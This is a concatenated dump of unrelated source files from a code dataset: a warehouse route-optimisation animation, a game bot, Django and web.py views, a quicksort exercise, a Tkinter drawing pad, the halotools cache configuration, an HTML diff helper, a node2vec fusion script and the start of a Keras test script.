= {\"route\": [], \"full_route\": [start_point], \"length\": [0]}\n path = [start_point] + path + [start_point]\n route[\"route\"] = path\n for index, point in enumerate(path):\n try:\n next_point = path[index + 1]\n except IndexError:\n next_point = None\n if next_point:\n response = dijkstra.shortestPath(point, next_point, graph)\n route[\"length\"].append(response[\"length\"])\n response[\"points\"].pop(0)\n route[\"full_route\"] = route[\"full_route\"] + response[\"points\"]\n return route\n\n\ndef getShortestRoute(start_point):\n global lotsFilteredMap, segment_graph, lookup\n orderedLotsSegments = setLotsMap(lotsFilteredMap, start_point, segment_graph)\n orderedLotssegment_graph = {}\n\n for lot in orderedLotsSegments:\n if lot[\"start\"] not in orderedLotssegment_graph:\n orderedLotssegment_graph.update({lot[\"start\"]: {}})\n orderedLotssegment_graph[lot[\"start\"]].update({lot[\"end\"]: {\"route\": lot[\"route\"], \"length\": lot[\"length\"]}})\n\n orderedLotsShortestRoute = getShortestRouteBetweenTwoPoints(start_point, orderedLotssegment_graph)\n full_path = []\n length = [0]\n for index, element in enumerate(orderedLotsShortestRoute[\"points\"]):\n try:\n next_element = orderedLotsShortestRoute[\"points\"][index + 1]\n except IndexError:\n next_element = None\n\n if next_element:\n route_1 = orderedLotssegment_graph[element][next_element][\"route\"]\n length.append(orderedLotssegment_graph[element][next_element][\"length\"])\n if index == 0:\n full_path = full_path + route_1\n else:\n for i, rt in enumerate(route_1):\n if i != 0:\n full_path.append(rt)\n return {\"route\": orderedLotsShortestRoute[\"points\"], \"full_route\": full_path, \"length\": length}\n\n\ndef getShortestRouteBetweenTwoPoints(startPoint, _segment_graph):\n global lotsFiltered\n if len(lotsFiltered) < 15:\n routes_1 = getPossibleRoutes(startPoint, _segment_graph, 200000)\n else:\n routes_1 = getPossibleRoutes(startPoint, _segment_graph, 200000)\n\n return routes_1\n\n\ndef setLotsMap(lotsFilteredMap, start_point, graph):\n global availableWeightGroups\n q = []\n points = [start_point]\n for w in lotsFilteredMap:\n for c in lotsFilteredMap[w]:\n points = points + lotsFilteredMap[w][c]\n points.append(start_point)\n for source in points:\n for dest in points:\n shorthest_path = dijkstra.shortestPath(source, dest, graph)\n q.append({\"start\": source, \"end\": dest,\n \"route\": shorthest_path[\"points\"],\n \"length\": shorthest_path[\"length\"]})\n return q\n\n\ndef getPossibleRoutes(start, segments, monte_count):\n global lotsFilteredMap, lookup\n _map_ = ast.literal_eval(str(lotsFilteredMap))\n weights = list(_map_.keys())\n weights.sort()\n weights.reverse()\n weight_group = {}\n routes_ = []\n routes_dict = []\n for i in range(monte_count):\n\n route = [start]\n\n for weight in _map_:\n corridor_list = list(_map_[weight].keys())\n numpy.random.shuffle(corridor_list)\n weight_group.update({weight: corridor_list})\n\n for weight in weights:\n for corridor in weight_group[weight]:\n aaa = _map_[weight][corridor][:]\n if numpy.random.choice([True, False]):\n aaa.reverse()\n route = route + aaa\n\n route = route + [start]\n if route in routes_:\n pass\n else:\n length = 0\n\n for index, point in enumerate(route):\n try:\n next_point = route[index + 1]\n except IndexError:\n next_point = None\n\n if next_point:\n # length = length + segments[point][next_point][\"length\"]\n length = length + segments[point][next_point][\"length\"]\n routes_.append(route)\n routes_dict.append({\"points\": route, \"length\": 
length})\n length = 0\n\n min_length = math.inf\n shortest_route = {}\n for r in routes_dict:\n if r[\"length\"] < min_length:\n min_length = r[\"length\"]\n shortest_route = r\n\n return shortest_route\n\n\nplot_flag = True\nif plot_flag:\n routes_dict = {}\n # for orderId in orderLots:\n orderId = 4021433107\n # 4021374543 # 4021374204 # 4021373940 # 4021379460 # 4021377612 # 4021373867 # 4021379633 # 4021378357 # 4021378235 # 4021373865 4021373891\n mapData(order_id=orderId)\n original_route = getOriginalRoute(\"Yol-14\", orderLots_original[orderId][\"route\"], segment_graph)\n route = getShortestRoute(\"Yol-14\")\n routes_dict.update({orderId: route})\n print(\"Original Route ---> Length: {} Route: {}\".format(sum(original_route[\"length\"]), original_route[\"route\"]))\n # print(\"Original Full Route : {}\".format(original_route[\"full_route\"]))\n print(\"-------------------------------\")\n print(\"Found Route ---> Length: {} Route: {}\".format(sum(route[\"length\"]), route[\"route\"]))\n # print(\"Found Full Route: {}\".format(route[\"full_route\"]))\n\n jobs = lotsFilteredMap\n weighted_dict = {}\n job_obj = []\n for weight in jobs:\n\n for kor in jobs[weight]:\n for point in jobs[weight][kor]:\n dicti = {\"id\": point, \"isPicked\": False, \"lon\":point_lookup[point][\"lon\"], \"lat\":point_lookup[point][\"lat\"], \"weight\": weight}\n job_obj.append(dicti)\n\n\n original_length = sum(original_route[\"length\"])\n orig_route = original_route[\"full_route\"][:]\n orig_order_list = original_route[\"route\"][:]\n orig_order_list.pop(0)\n orig_order_list.pop(-1)\n found_length = sum(route[\"length\"])\n found_route = route[\"full_route\"][:]\n found_order_list = route[\"route\"][:]\n found_order_list.pop(0)\n found_order_list.pop(-1)\n backgroundImage = plt.imread(\"./database/depo_clear_svg1.png\")\n x_or = []\n y_or = []\n x = []\n y = []\n\n\n # plt.axis([0.01, 0.144, -0.040, -0.0060])\n\n fig, ax = plt.subplots(figsize=(12, 4.2), dpi=150, facecolor='#e5e5e5', edgecolor='#000000')\n fig.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)\n extent = (0.0077, 0.148, -0.040, -0.0058)\n ax.axis('off')\n ax.set_title(\"Work Order ID: {}\\nOriginal Distance: {:.2f}\\nShorthened Distance: {:.2f}\".format(orderId, original_length, found_length))\n im1 = ax.imshow(backgroundImage, alpha=0.37, cmap=plt.cm.gray, interpolation='nearest', extent=extent)\n found_line = ax.plot([], [], color='blue', linewidth=4, label=\"Found\")[0]\n orig_line = ax.plot([], [], color='red', linewidth=3, linestyle='dashed', label=\"Original\")[0]\n found_loc = ax.plot(point_lookup[\"Yol-14\"][\"lon\"], point_lookup[\"Yol-14\"][\"lat\"], color='blue', marker=\"v\", markersize=12, label=\"Current\")[0]\n orig_loc = ax.plot(point_lookup[\"Yol-14\"][\"lon\"], point_lookup[\"Yol-14\"][\"lat\"], color='red', marker=\"v\", markersize=12, label=\"Current\")[0]\n\n weight_marker = {1: {\"color\": \"#ffe900\", \"marker\": \"o\", \"size\": 6},\n 2: {\"color\": \"#bbff00\", \"marker\": \"o\", \"size\": 8},\n 3: {\"color\": \"#7fff00\", \"marker\": \"o\", \"size\": 10},\n 4: {\"color\": \"#00ff77\", \"marker\": \"o\", \"size\": 12}}\n weight_legend = []\n for weight in availableWeightGroups:\n weight_legend.append(ax.plot([], [],\n color=weight_marker[weight][\"color\"],\n marker=weight_marker[weight][\"marker\"],\n markersize=weight_marker[weight][\"size\"],\n label=\"Weight: {}\".format(weight))[0])\n ax.legend(loc=4, prop={'size': 6})\n wiegthLines = {}\n for job in job_obj:\n 
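# one Line2D marker per pick location, keyed by point id: the weight_marker table above sets color/marker/size per weight group, and draw() below greys a marker out once its point is picked\n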
wiegthLines.update({job[\"id\"]: ax.plot(job[\"lon\"], job[\"lat\"],\n color=weight_marker[job[\"weight\"]][\"color\"],\n marker=weight_marker[job[\"weight\"]][\"marker\"],\n markersize=weight_marker[job[\"weight\"]][\"size\"],\n label=\"Weight: {}\".format(job[\"weight\"]))[0]})\n\n counter = 0\n counter1 = 0\n flag = False\n\n def draw(i):\n global flag, wiegthLines\n if i < len(orig_route):\n x_or.append(point_lookup[orig_route[i]][\"lon\"])\n y_or.append(point_lookup[orig_route[i]][\"lat\"])\n orig_loc.set_data(x_or[-1], y_or[-1])\n orig_line.set_data(x_or, y_or)\n if len(orig_order_list):\n if orig_order_list[0] == orig_route[i]:\n orig_order_list.pop(0)\n wiegthLines[orig_route[i]].set_color(\"gray\")\n flag = True\n else:\n k = i - len(orig_route)\n if flag:\n flag = False\n for job in job_obj:\n wiegthLines.update({job[\"id\"]: ax.plot(job[\"lon\"], job[\"lat\"],\n color=weight_marker[job[\"weight\"]][\"color\"],\n marker=weight_marker[job[\"weight\"]][\"marker\"],\n markersize=weight_marker[job[\"weight\"]][\"size\"],\n label=\"Weight: {}\".format(job[\"weight\"]))[0]})\n if len(found_order_list):\n if found_order_list[0] == found_route[k]:\n\n found_order_list.pop(0)\n wiegthLines[found_route[k]].set_color(\"gray\")\n\n x.append(point_lookup[found_route[k]][\"lon\"])\n y.append(point_lookup[found_route[k]][\"lat\"])\n found_line.set_data(x, y)\n found_loc.set_data(x[-1], y[-1])\n\n return [orig_line, found_line, orig_loc, found_loc] + list(wiegthLines.values())\n\n ani = animation.FuncAnimation(fig, draw, frames=len(orig_route)+len(found_route), interval=50, blit=True, repeat=False)\n\n plt.show()\n # from matplotlib import rcParams\n # rcParams['animation.ffmpeg_path'] = r'C:\\FFmpeg\\bin\\ffmpeg.exe'\n #\n # writer = \"ffmpeg\"\n # ani.save('./videos/newLayout_workOrder_{}.mp4'.format(orderId), writer=writer, dpi=200, metadata={\"title\": \"Captured Route Versus\",\n # \"artist\": \"Poi Labs\",\n # \"subtitle\": \"Work Order of {}\".format(orderId),\n # \"year\": 2019})\n # video_tag = ani.to_html5_video(embed_limit=5)\n # # print(video_tag)","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":15527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191258882","text":"\"\"\"\r\nThis is an example for a bot.\r\n\"\"\"\r\nfrom elf_kingdom import *\r\nfrom PrintData import print_data\r\n\r\ndef do_turn(game):\r\n \"\"\"\r\n Makes the bot run a single turn.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n\r\n # loc1 = Location(1804, 1388)\r\n # loc2 = Location(700, 5800)\r\n # speed = 200\r\n # next_loc = loc1.towards(loc2, speed)\r\n # print next_loc\r\n #\r\n # loc1 = Location(0, 0)\r\n # for i in range(20):\r\n # loc2 = Location(100, i)\r\n # d = loc1.distance(loc2)\r\n # print i, d\r\n\r\n temp_mana = game.get_my_mana()\r\n # print_data(game, -1)\r\n # print_data(game, 32)\r\n temp_mana = handle_elves(game, temp_mana)\r\n temp_mana = handle_portals(game, temp_mana)\r\n\r\n\r\ndef handle_elves(game, temp_mana):\r\n \"\"\"\r\n Gives orders to my elves.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n # Get enemy castle.\r\n enemy_castle = game.get_enemy_castle() # type: Castle\r\n enemy_portals = game.get_enemy_portals()\r\n enemy_elves = game.get_enemy_living_elves()\r\n\r\n # Go over all the living elves.\r\n for elf in game.get_my_living_elves():\r\n # Try to attack enemy castle, if not move to it.\r\n if game.turn < 30 and 
temp_mana >= game.portal_cost and elf.can_build_portal():\r\n elf.build_portal()\r\n temp_mana -= game.portal_cost\r\n game.debug( \"elf %s is building a portal\" %elf)\r\n continue\r\n\r\n # if len(enemy_portals) > 0:\r\n # attack_or_move(game, elf, enemy_portals[0])\r\n # continue\r\n\r\n if len(enemy_elves) > 0:\r\n attack_or_move(game, elf, enemy_elves[0])\r\n continue\r\n\r\n attack_or_move(game, elf, enemy_castle)\r\n\r\n return temp_mana\r\n\r\n\r\ndef attack_or_move(game, elf, target):\r\n if elf.in_attack_range(target):\r\n # Attack!\r\n elf.attack(target)\r\n # Print a message.\r\n game.debug(\"elf %s attacks %s\" % (elf, target))\r\n else:\r\n # Move to enemy castle!\r\n elf.move_to(target)\r\n # Print a message.\r\n game.debug(\"elf %s moves to %s\" % (elf, target))\r\n\r\n\r\ndef handle_portals(game, temp_mana):\r\n \"\"\"\r\n Gives orders to my portals.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n # Go over all of my portals.\r\n if game.turn < 20:\r\n return\r\n\r\n for portal in game.get_my_portals():\r\n # If the portal can summon a lava giant, do that.\r\n if (game.turn % 100) < 50:\r\n if temp_mana >= game.lava_giant_cost and portal.can_summon_lava_giant():\r\n # Summon the lava giant.\r\n portal.summon_lava_giant()\r\n temp_mana -= game.lava_giant_cost\r\n\r\n # Print a message.\r\n game.debug(\"portal %s summons a lava giant\" %(portal))\r\n else:\r\n if temp_mana >= game.ice_troll_cost and portal.can_summon_ice_troll():\r\n # Summon the lava giant.\r\n portal.summon_ice_troll()\r\n temp_mana -= game.ice_troll_cost\r\n # Print a message.\r\n game.debug(\"portal %s summons an ice troll\" %(portal))\r\n\r\n return temp_mana\r\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"344159020","text":"#-*- encoding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom models import ItemAgenda\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom forms import FormItemAgenda\nfrom django.template import RequestContext\nfrom django.http import Http404\n\ndef lista(request):\n lista_itens = ItemAgenda.objects.all()\n return render_to_response(\"lista.html\",{'lista_itens':lista_itens},\n context_instance = RequestContext(request))\n\ndef adiciona(request):\n if request.method == \"POST\":\n form = FormItemAgenda(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n \"\"\" so necessita se for feito o form na mao\n dados = form.cleaned_data\n item = ItemAgenda(\n data=dados['data'],\n hora=dados['hora'],\n titulo=dados['titulo'],\n descricao=dados['descricao'],\n )\n item.save()\"\"\"\n return render_to_response(\"salvo.html\",{})\n pass\n else:\n form = FormItemAgenda()\n return render_to_response(\"adiciona.html\",{'form':form},\n context_instance=RequestContext(request))\n\ndef item(request,nr_item):\n item = get_object_or_404(ItemAgenda,pk=nr_item)\n if request.method == \"POST\":\n form = FormItemAgenda(request.POST,request.FILES, instance=item)\n if form.is_valid():\n form.save()\n return render_to_response(\"salvo.html\",{})\n\n\n form = FormItemAgenda(instance=item)\n return render_to_response(\"item.html\",{'form':form},\n context_instance = RequestContext(request))\n\ndef remove(request,nr_item):\n item = get_object_or_404(ItemAgenda,pk=nr_item)\n if request.method == \"POST\":\n item.delete()\n return 
render_to_response(\"removido.html\",{})\n return render_to_response(\"remove.html\",{'item':item},\n context_instance = RequestContext(request))\n","sub_path":"gerenciador/agenda/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518826072","text":"\"\"\"The edx_lint list command.\"\"\"\n\nimport pkg_resources\n\n\ndef list_main(argv_unused): # pylint: disable=unused-argument\n \"\"\"\n list\n List the FILENAMEs that edx_lint can provide.\n \"\"\"\n print(\"edx_lint knows about these files:\")\n for filename in pkg_resources.resource_listdir(\"edx_lint\", \"files\"):\n print(filename)\n\n return 0\n","sub_path":"edx_lint/cmd/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346509598","text":"from django.db import models\n\n# Create your models here.\nclass Product(models.Model):\n\n id = models.BigAutoField(primary_key=True) # each item has distinct id. gives each item unique number\n title = models.CharField(max_length=200)\n description = models.TextField(blank=True, null=True) # can be left blank\n price = models.DecimalField(decimal_places = 2, max_digits=1000)\n image = models.ImageField(null=True, blank=True) # image has url\n listing_id\t= models.IntegerField(blank=True, null=True)\n productLink = models.URLField(max_length=200)\n\n def imageURL(self):\n try:\n url = self.image.url\n except:\n url = ''\n\n return url\n","sub_path":"firstpage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204427294","text":"import web\nfrom views.utils import get_nav_bar\nfrom models.project import get_categories, get_projects_by_status_and_category\n\n# Get html templates\nrender = web.template.render('templates/')\n\nclass Open_projects:\n \n def GET(self):\n \"\"\"\n Get all open projects \n\n :return: A page containing all open projects\n \"\"\"\n session = web.ctx.session\n data = web.input(categoryid=0)\n open_projects=[]\n if data.categoryid != 0:\n open_projects = get_projects_by_status_and_category(data.categoryid, \"open\")\n nav = get_nav_bar(session)\n categories = get_categories()\n return render.open_projects(nav, categories, open_projects)\n","sub_path":"src/app/views/open_projects.py","file_name":"open_projects.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"647261119","text":"from sys import stdin\ndef quick(lista):\n if len(lista) == 0:\n return []\n else:\n mitad = lista[-1]\n men, may = quick(menor(lista,mitad)),quick(mayor(lista,mitad))\n return men + [mitad] + may\ndef menor(lista,mitad):\n y = []\n for x in lista[:-1]:\n if x < mitad:\n y.append(x)\n return y\ndef mayor(lista,mitad):\n y = []\n for x in lista[:-1]:\n if x >= mitad:\n y.append(x)\n return y\ndef main():\n num = int(stdin.readline())\n while num != 0:\n lista = [int(x) for x in stdin.readline().strip().split()]\n print(\" \".join([str(x) for x in quick(lista)]))\n num = int(stdin.readline())\nmain()\n","sub_path":"ejercicios/Recurrence/ageord.py","file_name":"ageord.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"105193773","text":"import tkinter as tk\n\nwindow=tk.Tk()\nwindow.title('画板')\nwindow.geometry('+250+100')\ndraw=tk.Canvas(window,width=800,height=400)\ndraw.pack()\ndef paint(event):\n draw.create_oval(event.x-5,event.y-5,event.x+5,event.y+5,fill='black')\ndef clear(event,x=tk.ALL):\n return draw.delete(x)\ndraw.bind('',paint)\ndraw.bind('',clear)\ndraw.focus_set()\ntk.Label(window,text='按住鼠标左键绘图!空格键快捷清空!').pack(side=tk.BOTTOM)\ntk.Button(window,text='清空画板',command=lambda x=tk.ALL:draw.delete(x)).pack(side=tk.BOTTOM)\ntk.mainloop()\n","sub_path":"Python/画板程序/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"264354165","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"This module standardizes access to\nvarious files used throughout the halotools package. \n\"\"\"\n\n__all__ = ['get_catalogs_dir']\n\nsupported_sim_list = ['bolshoi', 'bolplanck', 'consuelo', 'multidark']\n\nimport os\nfrom astropy.config.paths import get_cache_dir as get_astropy_cache_dir\nfrom astropy.config.paths import _find_home\nimport warnings\n\nfrom . import sim_defaults\n\nfrom ..custom_exceptions import UnsupportedSimError, CatalogTypeError\n\ndef simname_is_supported(simname):\n \"\"\" Method returns a boolean for whether or not the input \n simname corresponds to a Halotools-supported simulation, as determined by \n the sub-classes of `~halotools.sim_manager.NbodySimulation`. \n\n Parameters \n ----------\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n Returns \n -------\n is_supported : bool \n\n \"\"\"\n return simname in supported_sim_list\n\ndef defensively_create_subdir(dirname):\n if not os.path.exists(dirname):\n try:\n os.mkdir(dirname)\n except OSError as e:\n if not os.path.exists(dirname):\n raise IOError(\"OS Error during creation of path %s\" % dirname)\n elif not os.path.isdir(dirname):\n msg = 'Pathname {0} is not a directory'\n raise IOError(msg.format(dirname))\n\n\ndef get_supported_halo_finders(input_simname):\n\n if input_simname not in supported_sim_list:\n raise UnsupportedSimError(input_simname)\n elif input_simname == 'bolshoi':\n return ['bdm', 'rockstar']\n else:\n return ['rockstar']\n\ndef get_catalogs_dir(**kwargs):\n \"\"\" Find the path to the subdirectory of the halotools cache directory \n where `catalog_type` are stored. \n \n If the directory doesn't exist, make it, then return the path. \n\n Parameters\n ----------\n catalog_type : string, optional \n String giving the type of catalog. \n Should be 'particles', 'subhalos', or 'raw_halos'. \n\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n halo_finder : string, optional \n Nickname of the halo-finder, e.g., `rockstar` or `bdm`. \n\n external_cache_loc : string, optional \n Absolute path to an alternative source of halo catalogs. \n Method assumes that ``external_cache_loc`` is organized in the \n same way that the normal Halotools cache is. 
Specifically: \n\n * Particle tables should located in ``external_cache_loc/particle_catalogs/simname``\n\n * Processed halo tables should located in ``external_cache_loc/halo_catalogs/simname/halo_finder``\n\n * Raw halo tables (unprocessed ASCII) should located in ``external_cache_loc/raw_halo_catalogs/simname/halo_finder``\n\n Returns\n -------\n dirname : str\n Path to the halotools directory storing simulation data.\n\n \"\"\"\n\n # Identify the root cache directory\n if 'external_cache_loc' in kwargs.keys():\n if os.path.isdir(kwargs['external_cache_loc']) is False:\n raise KeyError(\"Input external_cache_loc directory = %s \\n Directory does not exist\" % kwargs['external_cache_loc'])\n else:\n halotools_cache_dir = kwargs['external_cache_loc']\n else:\n homedir = _find_home()\n astropy_cache_dir = os.path.join(homedir, '.astropy', 'cache')\n defensively_create_subdir(astropy_cache_dir)\n\n halotools_cache_dir = os.path.join(astropy_cache_dir, 'halotools')\n defensively_create_subdir(halotools_cache_dir)\n\n\n if 'catalog_type' not in kwargs.keys():\n return halotools_cache_dir\n else:\n catalog_type = kwargs['catalog_type']\n\n acceptable_processed_halos_arguments = (\n ['subhalos', 'subhalo', 'halo', 'halos', \n 'halo_catalogs', 'subhalo_catalogs', 'subhalo_catalog', 'halo_catalog',\n 'halos_catalogs', 'subhalos_catalogs', 'subhalos_catalog', 'halos_catalog']\n )\n acceptable_particles_arguments = (\n ['particle', 'particles', 'particle_catalog', 'particle_catalogs', \n 'particles_catalog', 'particles_catalogs']\n )\n acceptable_raw_halos_arguments = (\n ['raw_halos', 'raw_subhalos', 'raw_halo', 'raw_subhalo', \n 'raw_halos_catalog', 'raw_subhalos_catalog', 'raw_halo_catalog', 'raw_subhalo_catalog', \n 'raw_halos_catalogs', 'raw_subhalos_catalogs', 'raw_halo_catalogs', 'raw_subhalo_catalogs']\n )\n\n if catalog_type in acceptable_processed_halos_arguments:\n subdir_name = 'halo_catalogs'\n elif catalog_type in acceptable_particles_arguments:\n subdir_name = 'particle_catalogs'\n elif catalog_type in acceptable_raw_halos_arguments:\n subdir_name = 'raw_halo_catalogs'\n else:\n raise CatalogTypeError(catalog_type)\n\n # Create the directory .astropy/cache/halotools/subdir_name\n catalog_type_dirname = os.path.join(halotools_cache_dir, subdir_name)\n defensively_create_subdir(catalog_type_dirname)\n\n # Now check to see if there exists a cache subdirectory for simname\n if 'simname' not in kwargs.keys():\n return catalog_type_dirname\n else:\n if kwargs['simname'] not in supported_sim_list:\n raise UnsupportedSimError(kwargs['simname'])\n\n simname_dirname = os.path.join(catalog_type_dirname, kwargs['simname'])\n defensively_create_subdir(simname_dirname)\n\n if 'halo_finder' not in kwargs.keys():\n return simname_dirname\n else:\n halo_finder_dirname = os.path.join(simname_dirname, kwargs['halo_finder'])\n defensively_create_subdir(halo_finder_dirname)\n return halo_finder_dirname\n\n\ndef processed_halo_tables_web_location(**kwargs):\n \"\"\" Method returns the web location where pre-processed \n halo catalog binaries generated by, and for use with, \n Halotools are stored. \n\n Parameters \n ----------\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n halo_finder : string, optional \n Nickname of the halo-finder, e.g., `rockstar` or `bdm`. 
\n\n Returns \n -------\n result : string \n If no arguments are passed, method returns the root web directory \n of the Halotools binaries, `root_web_dir`. \n If `simname` is passed, method returns `root_web_dir/simname`. \n If `simname` and `halo_finder` are both passed, \n method returns `root_web_dir/simname/halo_finder`. \n \"\"\"\n\n webroot = sim_defaults.processed_halo_tables_webloc\n\n if 'simname' not in kwargs.keys():\n return webroot\n else:\n simname = kwargs['simname']\n if 'halo_finder' not in kwargs.keys():\n return os.path.join(webroot, simname)\n else:\n halo_finder = kwargs['halo_finder']\n return os.path.join(os.path.join(webroot, simname), halo_finder)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"halotools/sim_manager/cache_config.py","file_name":"cache_config.py","file_ext":"py","file_size_in_byte":7458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"296149984","text":"from ghdiff import GHDiff\n\n\nclass HtmlDiff(GHDiff):\n html_start = ''\n html_end = '
'\n html_line = '%(prefix)s%(content)s'\n html_highlight = '%(content)s'\n\n css_classes = {\n 'control': 'comment',\n 'insert': 'added',\n 'delete': 'removed',\n }\n\n @classmethod\n def _colorize(cls, diff):\n if isinstance(diff, basestring):\n lines = diff.splitlines()\n else:\n lines = diff\n lines.reverse()\n while lines and not lines[-1].startswith(\"@@\"):\n lines.pop()\n yield cls.html_start\n while lines:\n line = lines.pop()\n css_class = \"\"\n if line.startswith(\"@@\"):\n css_class = \"control\"\n elif line.startswith(\"-\"):\n css_class = \"delete\"\n if lines:\n removed_stack = [line]\n added_stack = []\n while lines:\n line = lines.pop()\n if line[0] == '-':\n if added_stack:\n break\n removed_stack.append(line)\n line = None\n elif line[0] == '+':\n added_stack.append(line)\n line = None\n if len(added_stack) == len(removed_stack):\n break\n else:\n break\n\n while removed_stack and added_stack:\n aline, bline = cls._line_diff(removed_stack.pop(0)[1:], added_stack.pop(0)[1:])\n yield cls._make_line('delete', aline, prefix='-')\n yield cls._make_line('insert', bline, prefix='+')\n\n for removed_line in removed_stack:\n yield cls._make_line(css_class, cls.escape(removed_line))\n\n elif line.startswith(\"+\"):\n css_class = \"insert\"\n if line is not None:\n yield cls._make_line(css_class, cls.escape(line))\n yield cls.html_end\n\nclass HtmlDiffWithoutControl(HtmlDiff):\n @classmethod\n def _make_line(cls, css_class, content, prefix=''):\n if css_class == 'control':\n return ''\n return super(HtmlDiffWithoutControl, cls)._make_line(css_class, content, prefix)\n","sub_path":"gim/front/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"411362667","text":"import numpy as np\nfrom sklearn.manifold import TSNE\nfrom sklearn.utils import Bunch\nimport openne.node2vec as node2vec\nimport networkx as nx\nfrom sklearn.metrics import roc_auc_score\nfrom Code.Network_Fusion.fusion import snf_wrapper as sw\n\n\ndef cluster(nx_graph, ground_truth, Parameter, K1, mu, K2, t, tsne=False):\n wvecs = []\n for G in nx_graph:\n model_nf = node2vec.Node2vec(G, Parameter[\"walk_length\"], Parameter[\"num_walks\"], Parameter[\"dimensions\"], p=1, q=1, dw=True)\n index_num = sorted([int(i) for i in model_nf.vectors.keys()])\n g_embedding = [model_nf.vectors[str(i)] for i in index_num]\n wvecs.append(np.array(g_embedding))\n snf_wrapper = sw.snf_wrapper(wvecs, ground_truth)\n network, ground_truth, best, second = snf_wrapper.fusion(K1, mu, K2, t)\n return network, ground_truth, best, second\n\ndef cluster_E(nx_graph, ground_truth, Parameter, nodes, K1, mu, K2, t, tsne=False):\n # 基于node2vec的表示学习过程\n wvecs = []\n arr_size = len(nodes)\n walk_length = Parameter[\"walk_length\"]\n num_walks = Parameter[\"num_walks\"]\n dimensions = Parameter[\"dimensions\"]\n p = Parameter[\"p\"]\n q = Parameter[\"q\"]\n each_data = np.random.random((arr_size, dimensions))\n for G in nx_graph:\n model_nf = node2vec.Node2vec(G, walk_length, num_walks, dimensions, p=p, q =q, dw=True)\n index_num = sorted([int(i) for i in model_nf.vectors.keys()])\n g_embedding = [model_nf.vectors[str(i)] for i in index_num]\n wvecs.append(np.array(g_embedding))\n\n # SNF算法过程\n snf_wrapper = sw.snf_wrapper(wvecs, ground_truth)\n network, ground_truth, best, second = snf_wrapper.fusion_E(K1, mu, K2, t)\n\n # 返回学习到的网络\n return network, ground_truth, best, second\n","sub_path":"Code/Network_Fusion/Cluster - 
副本.py","file_name":"Cluster - 副本.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"547941174","text":"#!/usr/bin/env python\n\n\"\"\"Description:\nThe test.py is to evaluate your model on the test images.\n***Please make sure this file work properly in your final submission***\n\n©2018 Created by Yiming Peng and Bing Xue\n\"\"\"\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array, ImageDataGenerator\n\n# You need to install \"imutils\" lib by the following command:\n# pip install imutils\nfrom imutils import paths\nfrom sklearn.preprocessing import LabelBinarizer\nimport cv2\nimport os\nimport argparse\n\nimport numpy as np\nimport random\nimport tensorflow as tf\n\n# Set random seeds to ensure the reproducible results\nSEED = 309\nnp.random.seed(SEED)\nrandom.seed(SEED)\ntf.set_random_seed(SEED)\n\n# **************************To Dear Tutor***********************************************************\n# this global batch size is defined according to the template, please modify it when you do the test\n# **************************************************************************************************\nbatch_size = 15\n\n\ndef parse_args():\n \"\"\"\n Pass arguments via command line\n :return: args: parsed args\n \"\"\"\n # Parse the arguments, please do not change\n args = argparse.ArgumentParser()\n args.add_argument(\"--test_data_dir\", default = \"data/test\",\n help = \"path to test_data_dir\")\n args = vars(args.parse_args())\n return args\n\n\ndef load_images(test_data_dir, image_size = (224, 224)):\n \"\"\"\n Load images from local directory\n :return: the image list (encoded as an array)\n \"\"\"\n # **************************To Dear Tutor***********************************************************\n # my model achieve 93% in validation,but 33% here, it means something wrong with the data generator\n # and the way this file load image, so i have modified the way this script loads image, this load method\n # invokes the global batch_size variable, please modify it if you need to, thanks\n # **************************************************************************************************\n test_flow = ImageDataGenerator().flow_from_directory(test_data_dir,batch_size=batch_size,target_size=image_size)\n return test_flow\n\n\ndef preprocess_data(X):\n \"\"\"\n Pre-process the test data.\n :param X: the original data\n 